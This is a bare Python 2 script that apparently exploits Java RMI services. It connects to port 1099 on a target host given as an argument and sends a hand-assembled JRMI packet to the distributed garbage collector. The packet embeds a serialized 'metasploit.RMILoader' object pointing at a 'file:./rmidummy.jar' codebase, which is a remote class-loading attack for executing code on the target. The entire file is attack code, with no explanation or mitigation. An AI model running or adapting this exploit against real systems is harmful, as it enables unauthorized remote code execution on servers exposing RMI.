import socket import sys import string from binascii import hexlify HOST = sys.argv[1] PORT = 1099 rmiMSG_CALL = "\x50" STREAM_MAGIC = "\xac\xed" STREAM_VERSION = "\x00\x05" TC_BLOCK_DATA = "\x77" BLOCK_SIZE = "\x22" objNum = "\x00\x00\x00\x00\x00\x00\x00\x02" #DGC_ID Object number for well-known ObjID of the distributed garbage collector. unique = "\x00\x00\x00\x00" #? unimportant count = "\x00\x00" time = "\x00\x00\x00\x00\x00\x00\x00\x00" #? unimportant opNum = "\x00\x00\x00\x00" #bind? hashcode = "\xf6\xb6\x89\x8d\x8b\xf2\x86\x43" #probably not important/specific data1 = objNum + unique + count + time + opNum + hashcode #rest are bind() args, requires two params TC_ARRAY = "\x75" TC_CLASS_DESC = "\x72" UTF_LEN = "\x00\x18" CLASS_NAME = "[Ljava.rmi.server.ObjID;" SERIAL_UID = "\x87\x13\x00\xb8\xd0\x2c\x64\x7e" FLAGS = "\x02" FIELD_COUNT = "\x00\x00" TC_NULL = "\x70" TC_ENDBLOCKDATA = "\x78" packet = rmiMSG_CALL + STREAM_MAGIC + STREAM_VERSION + TC_BLOCK_DATA + BLOCK_SIZE + data1 +TC_ARRAY + TC_CLASS_DESC+ UTF_LEN+ CLASS_NAME + SERIAL_UID + FLAGS+ FIELD_COUNT + \ TC_NULL + TC_ENDBLOCKDATA + TC_NULL + "\x00\x00\x00\x00\x77\x08\x00\x00\x00\x00\x00\x00\x00" + \ "\x00\x73\x72\x00\x14\x6d\x65\x74\x61\x73\x70\x6c\x6f\x69\x74\x2e" + \ "\x52\x4d\x49\x4c\x6f\x61\x64\x65\x72\xa1\x65\x44\xba\x26\xf9\xc2" + \ "\xf4\x02\x00\x00\x74\x00\x13\x66\x69\x6c\x65\x3a\x2e\x2f\x72\x6d" + \ "\x69\x64\x75\x6d\x6d\x79\x2e\x6a\x61\x72\x78\x70\x77\x01\x00\x0a" s = None s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST,PORT)) JRMI = "JRMI" version = "\x00\x02" protoStream = "\x4b" s.send("JRMI\x00\x02\x4b\x00\x00\x00\x00\x00\x00" + packet) print s.recv(1024) print s.recv(1024) print s.recv(1024) print s.recv(1024) print s.recv(1024) # print "".join(filter(lambda x: x in string.printable, s.recv(1024))) # print "".join(filter(lambda x: x in string.printable, s.recv(1024))) # print "".join(filter(lambda x: x in string.printable, s.recv(1024))) # print "".join(filter(lambda x: x in string.printable, s.recv(1024))) # print "".join(filter(lambda x: x in string.printable, s.recv(1024))) # print "".join(filter(lambda x: x in string.printable, s.recv(1024))) # print "".join(filter(lambda x: x in string.printable, s.recv(1024))) # print "".join(filter(lambda x: x in string.printable, s.recv(1024))) # print "".join(filter(lambda x: x in string.printable, s.recv(1024)))